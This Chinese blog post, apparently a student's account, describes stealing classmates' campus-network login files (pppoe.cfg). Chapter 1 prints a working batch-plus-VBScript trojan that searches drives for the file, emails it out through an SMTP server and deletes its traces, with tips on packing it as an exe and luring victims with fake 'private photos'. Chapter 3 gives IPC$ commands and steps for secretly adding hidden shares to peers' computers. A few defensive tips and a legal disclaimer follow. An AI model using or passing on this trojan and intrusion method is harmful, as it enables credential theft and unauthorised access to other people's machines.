您现在的位置: Tracy‘Blog > 博客 > 黑人黑事 > 正文
校园网那些事(二)

【校园网那些事 —— 进阶篇】

Chapter 1——pppoe.cfg获取之木马法

我要得到pppoe.cfg,是的,我要得到pppoe.cfg,这是一个终极目标,我所有的努力都是为了得到这个(得先明确目标),上面也说明了有些什么方法可以让我们达到目的。首先偷看法我们就不说了,我没做过,没经验……我们就聊聊社工加上木马吧。

所谓社工就是,通过各种手段让别人对你建立起一种信任感,利用这份信任感,达到你想获取的信息。其实说白了就是欺骗。有想深入了解的可以看看凯文·米特尼克的《欺骗的艺术》。我们用木马的办法就是,骗他运行木马(让木马自动运行是入侵中最终极的目标,先不谈他)。

那么,这个木马要实现什么功能呢?毫无疑问,我们是要pppoe.cfg的,那么它要实现的功能就是,把对方电脑中的pppoe.cfg放到我电脑上。要实现这一任务的方法也有很多种。大家可以自己尽可能的去想。反正这个木马得有这么两个功能:

1. 是否存在pppoe.cfg

2. 如果存在,则将pppoe.cfg送到我电脑上。

第一个功能倒好实现,一个磁盘遍历可以解决问题了。可第二步呢?有什么方法呢?其实也很多,比如:

1. 我自己建立或者申请一个FTP空间,让程序将文件put到空间中。

2. 发邮箱吧,后台发送。

3. QQ文件传输?动作太大,而且,人家要是不是你好友怎么办?

4. 将它的文件夹共享,然后我们手动去找?太麻烦了。

所以,总结出前面两个容易实现一些,当然,你们也可以用其他办法,甚至看完我的方法之后,自己再用其他的语言实现。

我选择了用bat+vbs来实现我想要的功能?用bat是因为可以将bat文件转化为exe文件,从而方便捆绑。由于用bat实现邮件的发送,有很大的困难,所以,像我这种初级的脚本小子能想出的折中办法就是把batvbs结合起来了。代码及分析如下:

 

以下是bat片段:

@echo off                    ::关闭回显

set "FileName=pppoe.cfg"       ::变量FileName赋值为pppoe.cfg

for %%a in (C D E F G) do (      ::cdefg盘循环查找文件

  if exist %%a:\nul (

    pushd %%a:\

    for /r %%b in ("*%FileName%") do (

      if /i "%%~nxb" equ "%FileName%" (     ::如果找到了

        copy "%%b" c:\System.cfg            ::pppoe.cfg复制到c:\system.cfg

       goto:mail                               ::跳转到mail

      )

    )

    popd

  )

)                          ::前面主要实现的是一个遍历过程

:mail                      

(echo do                                  

……

echo loop)>C:\System.vbs   ::所有的echo后的字符全部打印到c:\system.vbs中。也就是实现生成一个vbs文件,内容为括号中除echo的部分

c:\system.vbs        ::运行system.vbs

del C:\System.vbs    ::为了不留下痕迹删除之

 

其中echo doecho loop之间的内容如下:

 

以下是vbs片段:

do

set objh=Createobject("MSXML2.XMLHTTP")

objh.open "GET","http://www.baidu.com",false

objh.send()

if objh.statustext = "OK" then

NameSpace = "http://schemas.microsoft.com/cdo/configuration/"  ‘检测是否联网

Set Email = CreateObject("CDO.Message")                   , ;                  ‘创建一个Object

Email.From = "发送方邮箱地址"        ‘发送方邮箱地址

Email.To = "接受方邮箱地址"

Email.Subject = "邮件主题"

Email.Textbody = "邮件内容"

Email.AddAttachment "c:\System.cfg"    ‘要发送的附件

With Email.Configuration.Fields

    .Item(NameSpace&"sendusing") = 2

    .Item(NameSpace&"smtpserver") = "smtp.163.com"   ‘如果你是其他的邮件服务器就改掉

    .Item(NameSpace&"smtpserverport") = 25

    .Item(NameSpace&"smtpauthenticate") = 1

    .Item(NameSpace&"sendusername") = "发送方用户名"

    .Item(NameSpace&"sendpassword") = "发送方密码"

    .Update

End With

Email.Send          ‘发送邮件

wscript.quit

End if

set objh=nothing

wscript.sleep 1000

loop

 

 

把它整合到一个批处理文件里面,再用工具转换为exe文件,可能你会问为什么要转换,首先,你也知道的,在这个上面有你邮箱的账户和密码,要是被别人知道了,会怎么样呢?其次呢,就是上面提到的,方便捆绑,估计现在上网的都有点常识,不随便运行别人发送的exe了。捆绑之后,就生成了我们想要的木马了(免杀什么的都是后话,自己才写出的东西就被添加到病毒特征码数据库的可能性也太小了吧)。

之后,就是你骗人的水平体现的时候了。前提是,运行这个文件的电脑是在我们学校的。不然,人家电脑上也不可能有这么一个pppoe.cfg在等着你啊。比如:在你班上或者协会QQ群共享里说这是你私密照片。比如:建立n曾目录,说是一个礼物,然后对方狂点一顿之后一不小心就运行了你的木马。比如:在校园网上上传附件。比如,更多邪恶的办法等着你去创造……

在这个过程中,我学会了bat遍历目录找文件的方法,学会了vbs发送邮件的方法,学会了如何巧妙的将两者结合,知道了for命令伟大的作用。这都是实践告诉我的。

在这里要提醒大家一个网络安全小常识:不要随意打开别人发过来的任何东西,虽说杀毒软件不是万能的,但是,物质的存在必然有它存在的价值,我们就姑且用它先一探究竟吧。

For命令详解:http://blog.sina.com.cn/s/blog_6f8dff020100n8a5.html                          http://blog.163.com/wangxiaoqiang2004@126/blog/static/107610443201031625318755/

 

Chapter 2——网络拓扑

几乎每一个了解黑客技术的孩子都是从局域网入侵中走过来的。通过局域网了解网络拓扑,了解一些基本的网络的概念。每当他们到接触到网络,他们都恨不得想知道,哪根网线接到哪去了。网络对于他们来说,就像是一个生活的环境,每当接触到一个新的网络,就像是搬到了一个陌生的城市,对他们来说最急切的,就是先搞清楚这座城市的每一条路。要不然,改天找不到回家的路了怎么办?而一个城市的车站,就相当于这个城市与外界的接口,就相当于我们某一个局域网中的路由或者交换机了。

可悲的是我这个伪黑客,居然在这个网络中生活了两年还没能够弄得清楚学校的大体网络结构。只能够凭空猜测着,它应该是这样子的:

学校的主服务器群

主路由器

各楼栋交换机

各楼层交换机

各寝室交换机

……

当然,这也只是猜测,反正,有一点可以肯定:我们一直是处于内网当中。我们通过校园网认证服务之后得到的ip地址也是由学校分配的a类地址。

一次无意间拿出lansee想扫一下寝室几个哥们的共享。无意间发现,在连上网之后,我们可以扫出同一网段的所有在线的电脑。也就是说,在我们拨上号之后,我们得到了一个A类的IP地址,而且,在学校内部我们之间的通信就是通过这个IP进行的。也就是说,我们在同一个网段中。也就是说!我们在同一个大一点的局域网中。

真的是这样子的么?我们用局域网入侵的方法试了几个同一网段的机器,发现推理没错。那就是说,我们的攻击方法也就实现了。我们可以用局域网攻防来实现盗号。

那,如果我们不是在同一个网段呢?拿出扫描工具,把整个10.0.x.x的网段都扫了一遍,发现,畅通无阻。也就是说,当我们拨上号之后,我们所有能够上网的人,实际上是在一个VPN虚拟专用网络)中了。

既然我们能够把它想象成一个局域网,sowhat can we do

(本想画一个象征性的网络拓扑图来着的,可在考完计网之后就把思科的模拟程序卸载了,so……)

Chapter 3——pppoe.cfg获取之网络攻击法

上面既然证实了咱们确实是在同一个局域网中,那么,曾大行其道的局域网入侵的方法,是否能够用得上呢?

先看看最常见的IPC$吧。IPC$(Internet Process Connection) 是共享 " 命名管道 " 的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。

详见百度百科:http://baike.baidu.com/view/528303.htm  

命令格式是:net use \\IP\ipc$ “pwd” /user:username

建立成功之后就会返回命令成功,也就意味着,你的可以有一定的权限控制他的电脑了。之后我用命令:net view \\ip 可以查看对方共享了一些什么,如果别人的c盘都共享了,那么他安装的校园网拨号客户端的文件夹是不是就可以被你访问呢?那么,你是不是就可以把你想要的pppoe.cfg复制出来呢?不过,我们都不傻,不会让我们的电脑中存在着一个手托着的C校园网那些事C盘共享),如果他不共享,我们仍然不能访问到我们想要访问的文件,怎么办呢?前面说了,如果ipc空连接建立成功,代表我们有一定的权限访问并且控制机器,那么我们是不是也就可以给对方开一个共享呢?如果可以,我们又要怎么去开共享才不会像上图那样明显的会被发现呢?

这时,我们要引入一个叫做“默认共享”的概念,也就是以“$”作为共享名的最后一位去共享某一个文件夹,这样子的话,在我的电脑里面看到的c盘,就不会有任何异常。(默认共享:http://baike.baidu.com/view/1296452.htm)但是一般情况下我们用net view \\ip是看不到对方开放的默认共享的。

于是,我们的步骤如下:

1. 在“我的电脑”上右键,选择“管理”

2. 在弹出的管理界面中,找到“连接到另一台计算机”

校园网那些事

3. 然后在这里输入我们要入侵的IP地址

4. 之后在共享中,看看有没有我们要的盘符,如果没有,我们可以右键新建共享

校园网那些事      校园网那些事

 

5.  

在弹出来的界面中如下图填入

校园网那些事

 

这样,你就成功的给对方的电脑添加了一个默认共享。那么我们要怎么运用他呢?怎么打开呢?我们可以直接在地址栏输入:\\IP\共享名来打开我们刚才新建的共享,如果是像我上面填写的,那么,我们就打开了他的C盘,就像在本地打开一样的。那么,你接下来要的也就只是找到pppoe.cfg并且把它复制到你本地就行了。

这也是我们最常见的局域网入侵方法,那么,怎么去防止呢?

1.   给电脑设一个稍微不常见的密码。像123456888888等这种被称作弱口令的东西在每一个扫描工具中都涉及了的。要想安全,给自己设个密吧

2.   其实系统自带的防火墙也不是那么差,我做过实验,在开通防火墙的情况下,上面的步骤全部失去了意义

3.   关闭默认共享

(五种方法:http://jingyan.baidu.com/article/5d368d1e3927983f60c057b0.html)自己看吧

4.   关闭IPC$默认共享连接

http://wenku.baidu.com/view/0de41385ec3a87c24028c4ef.html

(由于是记录教程的形式,也不想涉及太多,所以什么端口问题就先不谈了,有兴趣的可以自行百度了解)

由于这些东西老早就知道了,所以相对来说,这个过程中的收获的确不大,除了拿到了一批pppoe.cfg之外。

Chapter 4——pppoe.cfg改名的故事

经过上面的步骤之后我们就得到了传说中保存了账号和密码的pppoe.cfg了。(虽然良心不安,但还是安慰自己说,我只是充分利用资源,只是在他忙的时候使资源充分利用)。记得在前面说过,我们用把复制下来的pppoe.cfg是放在主程序旁边运行, , 的。而且,名字要是pppoe.cfg,是别的可不行。那,我们就只有把它改名字了,给它一个编号,1234……然后,在我们要用拨号的时候,再把它名字改为pppoe.cfg

看起来是可行的哈,但你也知道,不可能你随便找用一个改名字就可以拨上号了,原因很简单,可能你用的这个cfg是没有勾选保存密码的,可能这个cfg的主人自己正在上网,也有可能因为你经常用这个号,别人改密码了。所以……我们必须得不停的改名字,不停的实验,直到拨号成功。可能当你只有几个号的时候还可以忍受不停的改名字,但等你的账号越来越多而且你无法确定对方是改密码了还是暂时在线的时候,你绝对会为每次拨号改名而烦恼的。

当然,或许,你会说,我们用其他的方法,比如,我都建几个文件夹,每个文件夹里面放一个cfg文件和一个主程序。当然,这也是可行的。

但我想说的是,像这种机械化的工作真的是由我们来做么?一直以来在我的印象中,软件,就是为了帮人们把重复机械化的工作承担了。那么,我们用软件来实现它吧。

提到了软件,那么你想到了什么?自动改文件名、然后运行软件?

最终,这个问题一直就这么搁置着,因为,对于这么一个软件,我一直没能给他一个准确的定位,它仅仅是拨号客户端的一个辅助软件?还是要承担拨号的责任?

而且,在这个阶段,我们发现,在拨号的时候,我们的宽带连接是在进行拨号的,但是当我们把主程序里面显示的账号密码往系统自带的宽带连接输入,然后点击拨号的时候,返回的却是错误691。也就是说,这个不是我们真正的账号和密码。

那么,如果我们找到了真正的账号密码,是不是可以写一个循环拨号的软件,来简化我们改名的这个事情呢?当然,这是后话,因为,那时候我们甚至还并不知道它是怎么进行拨号的,到底有没有这么一个真正的账号密码存在还是一个问题。所以,这些也只是猜想,也是一种意识。

 

Chapter 5——共享上网

当然,在那个没有账号的时代里,我们想的更多的是,怎么从另外一个方面去充分利用账号的资源。比如,我发现大家想的最多的是:如何共享网络。甚至,很多人希望能够让自己的手机用上校园网,来缓解流量压力。

是啊,很多人都问过我这个问题,怎么去共享网络呢?

经过了这么久,无数人的摸索,传到我耳朵里的,我能知道的有下面这几种。没提到的还请读者前来补充。

1.   如果你和一个有账号的同学都是用的是笔记本,那么很好。把他的电脑用有线网卡拨号上网之后,把他的笔记本设置成一个AP热点。然后,你搜索到他的无线网络就可以共享了。设置方法:

http://wenku.baidu.com/view/7020ad04de80d4d8d15a4f73.html

2.   更多人能够想到的就是路由器了。是啊,路由器是个好东西。不仅可以让台式机共享起来,还能够用无线路由让笔记本和手机都用上,何乐而不为呢?但我们深切的知道,我们系统自带的宽带连接都没法拨上号,路由器的原理是一样的,他也不可能拨上号的。除非它能够用上我们的蝴蝶、也除非我们能找到真实账号密码,当然,这是YY

3.   那会儿协会一干部,从网上找到了一个虚拟路由软件,装上之后发现也能够用起到共享的作用。下载地址:(http://www.onlinedown.net/soft/43145.htm)设置方法之类的就不罗嗦了。

4.   那会儿,我花了一个下午泡在图书馆六楼,找局域网方面的书籍、有关网络共享方面的知识。全部用了个遍,还真没发现其他很好的办法。

Chapter 6——汇编语言

因为一直对黑客技术感兴趣,硬盘中自然也少不了一些黑客方面的教程。可以说是一个指引吧,让自己知道这一方面还有多少知识等着你去学习。记得在大一的时候,因为知道大二要开C,所以国二没报Access而是选择了VB,毕竟Access也只是一个软件,还不如多接触两门语言。考完国二应该是大一的下期,之后的时间就转头去看电子版王爽的《汇编语言》,不过,你也知道,电子版的书籍看起来着实不爽,但这本书在我去过的书店都没找到过,直到那个暑假,终于在宁波图书馆买回来了。然后,在那个暑假,如饥似渴的看了一遍,但却发现,除了知道了各个指令的作用、堆栈、内存等一些概念之后,根本没能用得上,更不要说像VB那样去给自己写一两个软件了。不过也正是这段经历,对后面学习逆向打下了一些基础。

无聊中,翻了一下硬盘中躺着的那些许黑客教程,发现了《黑鹰破解教程50课》。第一次看的时候由于时间问题,看了前面几课之后就没去看过了。但也算是一个了解,知道了一些破解思路、知道了壳的概念和脱壳的常用手法。在经历过上面的各种实践后,慢慢的觉得自己对破解、对脱壳也感兴趣起来了。于是,整个寒假把整套课程看了个遍,对照着三人行老师的讲解把其中的各个例子自己再练了一遍,也算是对破解了解了个大概吧,也是那是知道了看雪。看完后觉得自己浑身充满了力量,觉得自己真的挺不错了,然而随随便便下下来一个收费软件,左捣右弄了个把礼拜(主要是三人行老师说:脱壳、破解必须要有非同一般的耐心!于是,记住了~),发现自己尽奈何不了它。于是,自觉的把高昂的头颅低了下来,继续学习吧。

(……未完待续……)


 

 

声, 明:此文仅做技术参考、思路指引、网络安全概念的推广。并不涉及传播入侵知识、等非法行为。如用作非法之途,所造成后果由个人自行承担。《中华人民共和国刑法》有关计算机犯罪条例计算机软件保护条例

发表评论(1)
1楼 小宠  发表于  2013-5-31 15:09:27
呵呵! 和我经历有点像,我也喜欢黑客技术,我是高中的时候学的脱壳,只学会了堆栈平衡,已经异常法脱壳,其他就不是很懂了,汇编我也只了解了一部分,我个人喜欢linux操作系统,因为linux稳定易学 个人博客 http://inlinux.lofter.com/ 个人站点 www.flinux.nl.ae
[博主回复]  搞半天是你啊。那你的linux学得怎么样了呢?现在
姓名 *
电子邮件
QQ
评论内容 *
验证码 *图片看不清?点击重新得到验证码请输入图片后链接字符‘a’